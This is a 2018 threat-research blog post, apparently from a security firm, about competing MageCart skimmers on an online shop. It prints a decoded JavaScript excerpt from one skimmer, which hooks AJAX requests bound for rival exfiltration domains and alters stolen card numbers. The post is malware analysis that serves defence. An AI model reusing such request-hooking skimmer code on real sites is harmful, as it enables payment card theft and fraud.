Competing digital skimmers sabotage each other
by Sansec Forensics Team
Published in Threat Research − November 20, 2018
Skimmers found to subtly sabotage each others fraud operations
Competition is grim in the online skimming business (aka "MageCart"). The aggressive MagentoCore skimmer was previously observed to kick contending parasites from its victim hosts. But this week, we discovered that the battle has entered a new stage: advanced sabotage of each others revenue streams and reputation.
Sample case in question: cosmetics shop Bliv.com. It contains multiple distinct skimmers that send credit cards to different exfiltration hosts. The more advanced one is onlineclouds.cloud, which is heavily obfuscated and uses cloaking techniques. But with some sweating and curses, we decoded it (full source).
The interesting part is copied below. It detects whether any cards are sent to the (competing but inferior) skimmer domains js-react.com and bootstrap-js.com. Then, it subtly changes the last digit of the intercepted card number, effectively sending bogus card numbers to its competitor:
jQuery.ajaxSetup({
beforeSend: function (jqXHR, settings) {
if (
settings.url.indexOf("js-react.com") !== -1 ||
settings.url.indexOf("bootstrap-js.com") !== -1
) {
// ...
var myRandom = Math.floor(Math.random() * 10);
var old_cc = settings.data.match(cc);
var new_data = settings.data.replace(
new RegExp("[0-9]{13,16}", "g"),
old_cc[0].slice(0, -1) + myRandom
);
settings.data = new_data;
}
},
});
Why the subtle sabotage, instead of just killing the inferior skimmer? On the dark web markets, reputation is everything. If one sells non-working cards, angry customers will publicly complain and it will destroy the competing "brand".
It is not likely that the MageCart battle will be finished soon, so stay tuned...
Read more
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
